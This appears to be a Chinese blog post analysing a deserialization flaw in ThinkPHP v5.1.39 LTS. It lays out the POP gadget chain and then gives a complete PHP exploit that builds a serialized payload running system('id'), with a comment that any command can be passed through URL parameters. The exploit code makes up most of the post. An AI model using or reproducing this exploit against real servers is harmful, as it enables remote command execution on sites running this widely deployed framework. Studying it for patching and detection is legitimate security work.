A-A+

Thinkphp v5.1.39 LTS 反序列化漏洞分析 及 EXP(poc)

2021年07月22日 09:54 汪洋大海 暂无评论 阅读 27 views 次

POP链为:

Windows::__destruct --> Pivot::__toString --> Request::__call -->Request::isAjax --> Request::param --> Request::input --> Request::filterValue -->call_user_func

EXP(POC):
倘若要执行system('id'),则需要控制变量为以下值

Request->filter = "system";
Request->param = array('id');
Request->hook['visible'] = [$this,"isAjax"];
Request->config['var_ajax'] = '';
Pivot->data = ["azhe" => new Request()];
Pivot->append = ["azhe" => ["4ut","15m"]];
Windows->files = [new Pivot()];

---exp---
<?php

namespace think;
abstract class Model{
	private $data = [];
	protected $append = [];
	public function __construct(){
		$this->data = ["azhe" => new Request()];
		$this->append = ["azhe" => ["4ut","15m"]];
	}
}

class Request{
	protected $config = [
        // 表单请求类型伪装变量
        'var_method'       => '_method',
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',
        // 表单pjax伪装变量
        'var_pjax'         => '_pjax',
        // PATHINFO变量名 用于兼容模式
        'var_pathinfo'     => 's',
        // 兼容PATH_INFO获取
        'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
        // 默认全局过滤方法 用逗号分隔多个
        'default_filter'   => '',
        // 域名根,如thinkphp.cn
        'url_domain_root'  => '',
        // HTTPS代理标识
        'https_agent_name' => '',
        // IP代理获取标识
        'http_agent_ip'    => 'HTTP_X_REAL_IP',
        // URL伪静态后缀
        'url_html_suffix'  => 'html',
    ];
    protected $param = [];
    protected $hook = [];
    protected $filter;
    public function __construct(){
    	$this->filter = "system";
    	$this->hook = ["visible" => [$this, "isAjax"]];
    	$this->param = array('id');	//可以在这里写定命令,也可不在此设定,param函数会通过提交的参数来更新该值,故也可直接在地址栏提交任意参数执行命令
        $this->config['var_ajax'] = '';
    }
}

namespace think\process\pipes;
use think\Model\Pivot;
class Windows{
	private $files ;
    public function __construct(){
        $this->files = [new Pivot()];
    }
}

namespace think\model;
use think\Model;
class Pivot extends Model{
}

use think\process\pipes\Windows;
echo urlencode(serialize(new Windows()))."\n";
?>

 

Thinkphp v5.1.39 LTS 反序列化漏洞分析 及 EXP(poc)

 

Thinkphp v5.1.39 LTS 反序列化漏洞分析 及 EXP(poc)

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×

给我留言